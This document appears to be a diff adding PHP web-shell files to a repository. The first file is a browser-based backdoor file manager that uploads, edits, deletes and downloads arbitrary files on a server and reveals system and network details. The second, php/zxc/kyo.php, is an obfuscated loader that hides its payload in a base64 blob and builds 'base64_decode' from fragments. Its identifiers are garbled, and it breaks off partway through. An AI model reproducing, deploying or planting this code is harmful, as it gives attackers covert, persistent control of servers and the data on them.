+<html lang="en"><head><link rel="icon" type="image/png" href="https://telegra.ph/file/5eff4384d348c68a7e978.png"><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?= self ?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border border-primary-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-black table-responsive text-light border border-primary rounded"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div><span>PHP Version : <?= $fc[1]() ?></span> <br><a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a><a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a></div></div><div class="border-primary border-top table-responsive">
+<li>uname : <?= $fc[0]() ?></li>
+<li>doc Root: <?= "{$_SERVER["DOCUMENT_ROOT"]}"; ?></li>
+<li>server: <?= "{$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]}"; ?></li>
+<li>domain : <?= "{$_SERVER["SERVER_NAME"]}"; ?></li>
+<li>ip server: <?= getHostByName(getHostName()); ?></li>
+<li>php Version: <?= phpversion(); ?></li>
+<li>mysql: <?= (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; ?></li>
+<li>curl: <?= (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; ?></li>
+</div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-1 bg-transparent text-light">Choose file</label></div></div></form>
+<?php
+if (isset($_FILES["f"])) {
+	$n = $_FILES["f"]["name"];
+	for ($i = 0; $i < count($n); $i++) {
+		if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
+			a("file uploaded successfully");
+		} else {
+			a("file failed to upload", 0);
+		}
+	}
+}
+if (isset($_GET["download"])) {
+	header("Content-Type: application/octet-stream");
+	header("Content-Transfer-Encoding: Binary");
+	header("Content-Length: ".$fc[17](nhx($_GET["n"])));
+	header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\"");
+}
+?>
+</div><div class="shadow-lg bg-black border border-primary table-responsive mt-2 rounded"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
+<?php
+$ps = $fc[4]("/(\\\|\/)/", $p);
+foreach ($ps as $k => $v) {
+	if ($k == 0 && $v == "") {
+		echo "<a href=\"?p=2f\">~</a>/"; continue;
+	}
+	if ($v == "") continue;
+	echo "<a href=\"?p=";
+	for ($i = 0; $i <= $k; $i++) {
+		echo hex($ps[$i]);
+		if ($i != $k) echo "2f";
+	}
+	echo "\">{$v}</a>/";
+}
+?>
+</div></div><article class="shadow-lg bg-black border border-primary table-responsive mt-2 rounded">
+<?php if (!isset($_GET["a"])): ?>
+<table class="table table-hover table-border borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
+<?php
+$scD = $fc[5]($scD($p), [".", ".."]);
+foreach ($scD as $d) {
+	if (!$fc[6]("$p/$d")) continue;
+	echo "<tr><td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"".(($fc[8]("$p/$d")) ? "lime" : (!$fc[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td><td><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
+}
+foreach ($scD as $f) {
+	if (!$fc[7]("$p/$f")) continue;
+	$sz = $fc[10]("$p/$f")/1024;
+	$sz = round($sz, 3);
+	$sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB";
+	echo "<tr><td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"".(($fc[8]("$p/$f")) ? "lime" : (!$fc[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
+}
+?></tbody></table>
+<?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?>
+<div class="px-2 py-2">
+<?php if ($a == "delete") {
+	$loc = $p.'/'.nhx($_GET["n"]);
+	if ($_GET["t"] == "d") {
+		deldir($loc);
+		if (!$fc[12]($loc)) {
+			a("folder deleted successfully");
+		} else {
+			a("failed to delete the folder", 0);
+		}
+	}
+	if ($_GET["t"] == "f") {
+		$loc = $p.'/'.nhx($_GET["n"]);
+		unlink($loc);
+		if (!$fc[12]($loc)) {
+			a("file deleted successfully");
+		} else {
+			a("file to delete the folder", 0);
+		}
+	}
+}
+?>
+<?php if ($a == "newDir"): ?>
+<h5 class="border border-primary p-1 mb-3">New folder</h5>
+<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?>
+<h5 class="border border-primary p-1 mb-3">New file</h5>
+<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?>
+<h5 class="border border-primary p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5>
+<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?>
+<h5 class="border border-primary p-1 mb-3">Edit file</h5>
+<span>File name : <?= nhx($_GET["n"]) ?></span>
+<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
+<?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?>
+<h5 class="border border-primary p-1 mb-3">View file</h5>
+<span>File name : <?= nhx($_GET["n"]) ?></span>
+<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><div class="bg-black text-center mt-2"><small></small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>

php/zxc/kyo.php

@@ -0,0 +1,185 @@
+<?php
+$<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>嶨<EFBFBD><E5B6A8><EFBFBD><EFBFBD><EFBFBD>樯慬<E6A8AF><E685AC><EFBFBD><EFBFBD>庘<EFBFBD><E5BA98><EFBFBD>儺榗<E584BA><E6A697>禳<EFBFBD>閳<EFBFBD>肑<EFBFBD>緳<EFBFBD><E7B7B3> =
+    "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";
+<EFBFBD><EFBFBD><EFBFBD>䆀嘉<EFBFBD><EFBFBD>尟<EFBFBD><EFBFBD><EFBFBD>嬨<EFBFBD>友<EFBFBD>弣<EFBFBD><EFBFBD>庘<EFBFBD><EFBFBD><EFBFBD><EFBFBD>廜閦<EFBFBD><EFBFBD>峉<EFBFBD>锁<EFBFBD><EFBFBD><EFBFBD><EFBFBD>訏<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>矣<EFBFBD>庣<EFBFBD><EFBFBD>揯<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>娅<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>覮<EFBFBD><EFBFBD><EFBFBD>聜<EFBFBD><EFBFBD>妗(
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>嶨<EFBFBD><E5B6A8><EFBFBD><EFBFBD><EFBFBD>樯慬<E6A8AF><E685AC><EFBFBD><EFBFBD>庘<EFBFBD><E5BA98><EFBFBD>儺榗<E584BA><E6A697>禳<EFBFBD>閳<EFBFBD>肑<EFBFBD>緳<EFBFBD><E7B7B3>
+);
+function <EFBFBD><EFBFBD><EFBFBD>䆀嘉<EFBFBD><EFBFBD>尟<EFBFBD><EFBFBD><EFBFBD>嬨<EFBFBD>友<EFBFBD>弣<EFBFBD><EFBFBD>庘<EFBFBD><EFBFBD><EFBFBD><EFBFBD>廜閦<EFBFBD><EFBFBD>峉<EFBFBD>锁<EFBFBD><EFBFBD><EFBFBD><EFBFBD>訏<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>矣<EFBFBD>庣<EFBFBD><EFBFBD>揯<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>娅<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>覮<EFBFBD><EFBFBD><EFBFBD>聜<EFBFBD><EFBFBD>妗(
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>朙趣<E69C99>䉆<EFBFBD><E48986><EFBFBD><EFBFBD>机<EFBFBD><E69CBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+) {
+    $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD> =
+        "bas" . "e64" . "_de" . "cod" . "e";
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD> = [
+        "C",
+        "P",
+        "Q",
+        "T",
+        "U",
+        "M",
+        "V",
+        "h",
+        "E",
+        "L",
+        "l",
+        "0",
+        "K",
+        "8",
+        "C",
+        "l",
+        "a",
+        "U",
+        "D",
+        "e",
+        "4",
+        "I",
+        "m",
+        "1",
+        "5",
+        "s",
+        "b",
+        "R",
+        "Y",
+        "O",
+        "u",
+        "W",
+        "X",
+        "Z",
+        "+",
+        "c",
+        "@",
+        "d",
+        "3",
+        "r",
+        "F",
+        ")",
+        "B",
+        "y",
+        "C",
+        "J",
+        "q",
+        "G",
+        "#",
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "Uw=="
+        ),
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "bw=="
+        ),
+        $<24><><EFBFBD><EFBFBD>庯<EFBFBD><E5BAAF><EFBFBD>䰨<EFBFBD><E4B0A8>椺召<E6A4BA><E58FAC><EFBFBD><EFBFBD>谘<EFBFBD><E8B098><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>傯<EFBFBD><E582AF><EFBFBD><EFBFBD>痖<EFBFBD>呜<EFBFBD><E5919C><EFBFBD>昺<EFBFBD><E698BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>埴䜺<E59FB4><E49CBA><EFBFBD><EFBFBD><EFBFBD>晤<EFBFBD>寏<EFBFBD><E5AF8F><EFBFBD><EFBFBD>(
+            "SA=="
+        ),
+        "4",
+        "A",
+        "i",
+        "j",
+        "t",
+        "v",
+        "w",
+        "x",
+        "z",
+        "g",
+        "%",
+        "(",
+        '$',
+        "_",
+        "+",
+        "2",
+        "x",
+        "(",
+        "f",
+        "6",
+        "j",
+        "k",
+        "n",
+        "p",
+        "*",
+        "9",
+        "N",
+        "1",
+        "3",
+        "3",
+        "7",
+        ";",
+    ];
+    $<24><><EFBFBD><EFBFBD>箮<EFBFBD><E7AEAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[23] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[80] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[61] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[33] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[21] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[74] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[40];
+    $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>剤<EFBFBD>磺嬋儴<E5AC8B>叙<EFBFBD><E58F99>躺<EFBFBD><E8BABA><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[57] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[15] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[49] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[27] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39];
